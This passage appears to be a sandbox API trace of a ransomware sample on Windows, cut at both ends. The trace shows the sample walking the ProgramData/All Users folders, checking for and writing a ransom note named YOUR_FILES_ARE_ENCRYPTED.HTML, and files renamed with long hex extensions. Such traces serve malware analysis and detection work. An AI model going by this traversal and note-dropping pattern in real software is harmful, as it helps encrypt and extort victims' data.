pszDest="\\\\?\\C:\\Users\\All Users\\Templates") returned 32 [0110.604] GetProcessHeap () returned 0x600000 [0110.604] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.604] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\Templates" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Templates") returned="\\\\?\\C:\\Users\\All Users\\Templates" [0110.604] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Templates", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Templates\\*") returned="\\\\?\\C:\\Users\\All Users\\Templates\\*" [0110.604] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Templates\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb07030b1, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb07030b1, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0707da1, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="翿")) returned 0xffffffff [0110.604] GetProcessHeap () returned 0x600000 [0110.604] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.604] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="USOPrivate", cAlternateFileName="USOPRI~1")) returned 1 [0110.604] StrStrIW (lpFirst="USOPrivate", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.604] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOPrivate") returned 33 [0110.604] GetProcessHeap () returned 0x600000 [0110.604] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.604] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\USOPrivate" | out: lpString1="\\\\?\\C:\\Users\\All Users\\USOPrivate") returned="\\\\?\\C:\\Users\\All Users\\USOPrivate" [0110.604] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\USOPrivate", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\USOPrivate\\*") returned="\\\\?\\C:\\Users\\All Users\\USOPrivate\\*" [0110.604] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\USOPrivate\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf99491c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xb0739e85, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.604] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xf99491c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xb0739e85, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="..", cAlternateFileName="")) returned 1 [0110.604] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xb07deb11, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb07deb11, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="UpdateStore", cAlternateFileName="UPDATE~1")) returned 1 [0110.604] StrStrIW (lpFirst="UpdateStore", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.604] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore") returned 45 [0110.605] GetProcessHeap () returned 0x600000 [0110.605] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.606] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore" | out: lpString1="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore") returned="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore" [0110.606] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*") returned="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*" [0110.606] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xb07deb11, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb07deb11, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623af8, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0110.606] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xb07deb11, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb07deb11, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623af8, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.606] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf99491c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9102ec79, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb07e33df, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x349, dwReserved0=0x623af8, dwReserved1=0x626bc0, cFileName="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.1A710B472D26EA7721EA0FC24883CB9ACC6FD80FEB948210DC4390E38861A569", cAlternateFileName="UPDATE~1.1A7")) returned 1 [0110.606] StrStrIW (lpFirst="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.1A710B472D26EA7721EA0FC24883CB9ACC6FD80FEB948210DC4390E38861A569", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.606] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore\\updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.1A710B472D26EA7721EA0FC24883CB9ACC6FD80FEB948210DC4390E38861A569") returned 162 [0110.606] PathFindExtensionW (pszPath="updatestore51b519d5-b6f5-4333-8df6-e74d7c9aead4.xml.1A710B472D26EA7721EA0FC24883CB9ACC6FD80FEB948210DC4390E38861A569") returned=".1A710B472D26EA7721EA0FC24883CB9ACC6FD80FEB948210DC4390E38861A569" [0110.606] lstrlenW (lpString=".1A710B472D26EA7721EA0FC24883CB9ACC6FD80FEB948210DC4390E38861A569") returned 65 [0110.606] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb073023f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb073023f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0733f3f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623af8, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.606] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb073023f, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb073023f, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb0733f3f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x623af8, dwReserved1=0x626bc0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.606] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0110.606] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0110.606] GetProcessHeap () returned 0x600000 [0110.606] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.606] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\USOPrivate\\UpdateStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\usoprivate\\updatestore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.607] GetProcessHeap () returned 0x600000 [0110.607] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.607] GetProcessHeap () returned 0x600000 [0110.607] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3163dd0 | out: hHeap=0x600000) returned 1 [0110.607] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0739e85, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb0739e85, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb073da71, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.607] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0739e85, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xb0739e85, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xb073da71, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.607] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.608] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOPrivate\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 63 [0110.608] GetProcessHeap () returned 0x600000 [0110.608] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d47c0 [0110.608] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\USOPrivate\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\usoprivate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.608] GetProcessHeap () returned 0x600000 [0110.608] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d47c0 | out: hHeap=0x600000) returned 1 [0110.608] GetProcessHeap () returned 0x600000 [0110.608] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6c47b8 | out: hHeap=0x600000) returned 1 [0110.609] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf97592c3, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x19f200, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 1 [0110.609] StrStrIW (lpFirst="USOShared", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.609] wnsprintfW (in: pszDest=0x6b47b0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared") returned 32 [0110.609] GetProcessHeap () returned 0x600000 [0110.609] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6c47b8 [0110.610] lstrcpyW (in: lpString1=0x6c47b8, lpString2="\\\\?\\C:\\Users\\All Users\\USOShared" | out: lpString1="\\\\?\\C:\\Users\\All Users\\USOShared") returned="\\\\?\\C:\\Users\\All Users\\USOShared" [0110.610] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\USOShared", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\USOShared\\*") returned="\\\\?\\C:\\Users\\All Users\\USOShared\\*" [0110.610] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\USOShared\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xb0754c6b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.610] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf97592c3, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xb0754c6b, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="..", cAlternateFileName="")) returned 1 [0110.610] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x5a5036cd, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5a5036cd, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x626be6, dwReserved1=0x626bb8, cFileName="Logs", cAlternateFileName="")) returned 1 [0110.610] StrStrIW (lpFirst="Logs", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.610] wnsprintfW (in: pszDest=0x6c47b8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs") returned 37 [0110.610] GetProcessHeap () returned 0x600000 [0110.610] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3163dd0 [0110.611] lstrcpyW (in: lpString1=0x3163dd0, lpString2="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs" | out: lpString1="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs") returned="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs" [0110.611] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\*") returned="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\*" [0110.611] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x5a5036cd, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0xb074d703, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0110.611] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x5a5036cd, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0xb074d703, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="..", cAlternateFileName="")) returned 1 [0110.611] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2000, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x5a5036cd, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x5a5036cd, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateSessionOrchestration.001.etl", cAlternateFileName="UP2DAF~1.ETL")) returned 1 [0110.611] StrStrIW (lpFirst="UpdateSessionOrchestration.001.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.611] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.001.etl") returned 72 [0110.611] PathFindExtensionW (pszPath="UpdateSessionOrchestration.001.etl") returned=".etl" [0110.611] lstrlenW (lpString=".etl") returned 4 [0110.611] PathFindExtensionW (pszPath="UpdateSessionOrchestration.001.etl") returned=".etl" [0110.611] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf98df460, ftLastAccessTime.dwHighDateTime=0x1d705ef, ftLastWriteTime.dwLowDateTime=0x22721e58, ftLastWriteTime.dwHighDateTime=0x1d705f0, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateSessionOrchestration.002.etl", cAlternateFileName="UP3884~1.ETL")) returned 1 [0110.611] StrStrIW (lpFirst="UpdateSessionOrchestration.002.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.611] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.002.etl") returned 72 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.002.etl") returned=".etl" [0110.612] lstrlenW (lpString=".etl") returned 4 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.002.etl") returned=".etl" [0110.612] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x6fb852ed, ftLastAccessTime.dwHighDateTime=0x1d705ed, ftLastWriteTime.dwLowDateTime=0xa05d916a, ftLastWriteTime.dwHighDateTime=0x1d705ed, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateSessionOrchestration.003.etl", cAlternateFileName="UP8247~1.ETL")) returned 1 [0110.612] StrStrIW (lpFirst="UpdateSessionOrchestration.003.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.612] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.003.etl") returned 72 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.003.etl") returned=".etl" [0110.612] lstrlenW (lpString=".etl") returned 4 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.003.etl") returned=".etl" [0110.612] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x46a3d34f, ftLastAccessTime.dwHighDateTime=0x1d705cc, ftLastWriteTime.dwLowDateTime=0x6df6574e, ftLastWriteTime.dwHighDateTime=0x1d705cc, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateSessionOrchestration.004.etl", cAlternateFileName="UPD2FC~1.ETL")) returned 1 [0110.612] StrStrIW (lpFirst="UpdateSessionOrchestration.004.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.612] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.004.etl") returned 72 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.004.etl") returned=".etl" [0110.612] lstrlenW (lpString=".etl") returned 4 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.004.etl") returned=".etl" [0110.612] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x95f9994e, ftLastAccessTime.dwHighDateTime=0x1d7046d, ftLastWriteTime.dwLowDateTime=0x95f9994e, ftLastWriteTime.dwHighDateTime=0x1d7046d, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateSessionOrchestration.005.etl", cAlternateFileName="UPB784~1.ETL")) returned 1 [0110.612] StrStrIW (lpFirst="UpdateSessionOrchestration.005.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.612] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.005.etl") returned 72 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.005.etl") returned=".etl" [0110.612] lstrlenW (lpString=".etl") returned 4 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.005.etl") returned=".etl" [0110.612] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x9ee92c6a, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0xc6371102, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x3000, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateSessionOrchestration.006.etl", cAlternateFileName="UP7D55~1.ETL")) returned 1 [0110.612] StrStrIW (lpFirst="UpdateSessionOrchestration.006.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.612] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.006.etl") returned 72 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.006.etl") returned=".etl" [0110.612] lstrlenW (lpString=".etl") returned 4 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.006.etl") returned=".etl" [0110.612] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xe7e7af85, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xe7e7af85, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0x623e18, dwReserved1=0x626bc0, cFileName="UpdateSessionOrchestration.007.etl", cAlternateFileName="UPDATE~4.ETL")) returned 1 [0110.612] StrStrIW (lpFirst="UpdateSessionOrchestration.007.etl", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.612] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\USOShared\\Logs\\UpdateSessionOrchestration.007.etl") returned 72 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.007.etl") returned=".etl" [0110.612] lstrlenW (lpString=".etl") returned 4 [0110.612] PathFindExtensionW (pszPath="UpdateSessionOrchestration.007.etl") returned=".etl" [0110.612] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf97592c3, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0x4e8a793e, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x4e8a793e, 